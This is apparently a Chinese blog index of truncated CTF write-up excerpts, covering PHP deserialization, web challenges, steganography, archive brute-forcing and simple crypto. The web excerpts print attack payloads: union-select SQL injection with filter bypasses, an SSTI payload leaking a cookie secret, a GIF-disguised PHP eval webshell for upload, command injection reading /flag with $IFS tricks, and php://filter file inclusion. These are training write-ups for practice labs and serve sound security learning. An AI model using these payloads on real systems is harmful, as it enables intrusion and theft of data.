yu_jing_hong的博客

PHP反序列化漏洞一，什么是序列与反序列 序列就是把数据转成可逆的数据结构，目的是方便数据的储存和传输，反序列就是将数据逆转成原来的状态，序列就是拆数据，使得传输或储存更容易的过程，反序列就是重新拼凑还原数据的过程。二，PHP中的反序列方法PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和反序列化。序列化：serialize()将一个对象转换成一个字符串。反序列化：un.

1.baby_web找初始页面一般的，初始页面是index.php，就在地址栏进入，但发现还是会回调到1.php这个页面，那么接在在开发者工具打开network查看index.php的情况。得到响应头里的flag ，结束。补充一点知识302状态码：302 表示临时性重定向。访问一个Url时，被重定向到另一个url上。常用于页面跳转。在响应头中加入Location参数。浏览器接受到带有location头的响应时，就会跳转到相应的地址。如下方的，location跳转地址是1.ph

1.查看源码可以用快捷键ctrl+U得到flag2.robotsrobot就是机器人的意思，robots.txt就是关于机器人的一个协议文档，这个机器人指搜索引擎的蜘蛛，在《互联网搜索引擎服务自律公约》第七条有“遵循国际通行的行业惯例与商业规则，遵守机器人协议(robots协议）。这个文档是搜索引擎中访问网站的时候要查看的第一个文件，文件中会明确告诉搜索引擎允不允许访问这个网站。访问robots.txt文档 robots.txt的两条规则 ①User-age..

题目提示有过滤，首先尝试万能密码登录 可以根据错误提示知道or被过滤掉了，可以尝试双写绕过果然没这么简单得到flag，再尝试注入猜字段，构造payload:?username=-1' union select 1,2,database() %23 &password=1'+oorr 1='1又提示错误，肯定是union select被过滤了，双写绕过payload:?username=-1' uniunionon seselectlect 1,2,3 %23 &.

存在render函数渲染需要知道cookie_secret首先访问/fllllllllllllag显示error?msg=Error,猜测服务端模板存在注入攻击（SSTI）尝试验证/error?msg={{datetime}}再构造payload获取cookie_secret：/error?msg={{handler.settings}}'cookie_secret': 'b94dd73c-a043-429c-9725-33525b0c2c3f'...

看到题目让我们上传图片先随便上传一张图片但是进去后什么也没有，提示没有图像写一段带gif图片头的一句话木马保存文件并命名为a.phtmlGIF89a? <script language="php">eval($_REQUEST[a])</script>上传文件的同时用BS抓包再更改一下类型再放包放包同步到浏览器显示文件名上传成功！用蚁剑连接upload目录下的地址找到flag存在的文件夹能检测到一句话木马的路径猜测是uploa...

13.easy calc打开网页查看源代码看到有一个calc.php,访问一下源码过滤了很多字符，先看文件包含了什么目录，构造? num=var_dump(scandir(/))，但是'/'符号会被WAF不让'/'通过，可以通过绕过来解决这个问题。首先查看'/'的ASCII码是47，构造? num=var_dump(scandir(chr(47)))发现存在一个f1agg文件，于是构造? num=var_dump(file_get_contents(chr(47).f1.

11.knife根据题目提示白给的shell,这道题用蚁剑解，打开蚁剑，右键点击添加数据在列表下面找到flag文件flag{9ac1fb64-ba7d-4ffe-a03a-ecb8f926b60c}12.Http 1首先进入该网站查看源代码看到这里有一个secret.php,访问一下显示：你不是来自https://www.Sycsecret.com的题目是http ，上面提示不是来自https://www.Sycsecret....

10.ping ping ping看到题目首先构造payload来ping一下再查看数据目录得到两个子目录，查看flag.php根据信息提示可知空格被过滤掉了，尝试$IFS$1代替空格flag也被过滤了，再输入index代替解决通过这里可以看到好多字符被过滤了，看到最后有一个a变量，考虑改变这个a变量来进行绕过,把a改成g用来拼接flag的g就可以了。在地址栏输入/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php什么也没..

8.exec先Ping一下127.0.0.1 ，得到回显输入 127.0.0.1;ls /获得根目录看到有flag文件，输入127.0.0.1;cat /flag获取flagflag{2093b9f0-e3cf-4ab0-beed-bf9f20e772e9}9.loveSQL先试用万能密码登录得到了尝试MD5解密发现查询不到，那么看看是否存在注入，首先查看字段数，在url中分别输入/check.php?username=adm...

7.secret file打开源码查看，有一个.php文件，访问这个文件打开源码，看到有acthion.php点击访问一下,然而发现并没有跳转访问acthion.php，而是转到了end.php

5.incloud首先得到源码根据题目提示incloud和源码中有file文件包含函数，猜测文件包涵漏洞。用php://filter伪协议来测试该伪协议读取源代码并进行base64编码输出，输入file=php://filter/read=convert.base64-encode/resource=flag.php得到再进行base64解密flag{44c05328-b1c9-4dbf-a465-06c508a4a06b}...

首先，判断是否存在注入，若输入1'发现不回显，输入1'#显示回显正常，那么就存在注入然后判断注入是字符型还是数字型，输入1'or'1'=1回显正常，那么该注入应该是字符型第二步，猜解SQL查询语句中的字段数输入1'order by 1#回显正常再输入1'order by 2#,回显正常直到输入1'order by 3#显示错误，那么字段数就有两个第三步，显示字段，输入1'union select 1,2#回显一个正则过滤规则过滤了select，u...

打开链接看到一张图，查看源代码，看到有.php文件查看.php文件的源代码代码审计

18.小明的保险箱小明有一个保险箱，里面珍藏了小明的日记本，他记录了什么秘密呢？。。。告诉你，其实保险箱的密码四位纯数字密码。（答案格式：flag｛答案｝，只需提交答案） 注意：得到的 flag 请包上 flag{} 提交binwalk用-e分解文件共享到主机上得到一个压缩包但是txt*文件需要输入口令。直接用ARCHPR暴力破解这个压缩包就得到口令是7869了打开压缩包的txt文件输入口令得到flag{75a3d68bf071ee188c418ea6cf0bb043}...

17.镜子里的世界打开隐写工具stegsolve,看到有关键词key.flag{st3g0_saurus_wr3cks}20.easycap用wareshark打开发现全是tcp包，追踪流量,得到flag{385b87afc8671dee07550290d16a8071}

11.wireshark使用Charles打开文件选择POST包点击下方Contend可以看到flag{ffb7567a1d4f4abdffdb54e022f8facd}12.RAR使用ARCHPR暴力破解得到口令8795获得flag{1773c5da790bd3caff38e3decd180eb7}13.qrCQR直接打开扫描二维码得到Flag{878865ce73370a4ce607d21ca01b5e59}14.ZIP伪加密...

8,乌镇峰会种图使用010打开看到下方有flag9.LSB用StegSolve打开点击Save Bin得到一个二维码图片用OR识别得到 cumtctf{1sb_i4_s0_Ea4y}10.图片中的秘密打开图片属性找到flag...

11.RSA在一次RSA密钥对生成中，假设p=473398607161，q=4511491，e=17求解出d作为flga提交有关RSA（1）参数P= 第一个大素数Q= 第二个大素数 (P和Q的长度不能相差太大！)E= 公钥 (一个随机数，必须满足：GCD(E,(P-1)*(Q-1))==1)(译者注：即E和(p-1)(Q-1)互素)N= 公用模数，由P和Q生成：N=P*QD= 私钥：D=E^(-1) mod ((P-1)*(Q-1))（2...

6.passward姓名：张三生日：19900315key格式为key{xxxxxxxxxx}数了一下x有十个猜测是zs199003157.变异凯撒afZ_r9VYfScOeO_UL^RWUc题目中给的除了字母还有特殊符号可以想到ascii码表，移位归到字母上，并且结合flag{}形式，可以判断出移位的数字是渐变的，最后就是将原来给的字符串变成明文即可。8.Quoted-printable=E9=82=A3=E4=BD=A0=E4=B9=9F=E5=BE=